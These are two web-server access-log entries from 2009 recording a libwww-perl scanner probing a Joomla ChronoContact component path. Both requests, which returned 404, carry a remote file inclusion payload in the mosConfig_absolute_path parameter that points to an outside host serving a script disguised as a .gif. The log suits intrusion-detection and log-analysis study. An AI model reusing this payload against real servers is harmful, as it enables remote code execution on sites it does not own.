200.54.154.10 - - [04/Jan/2009:08:41:02 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:41:03 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
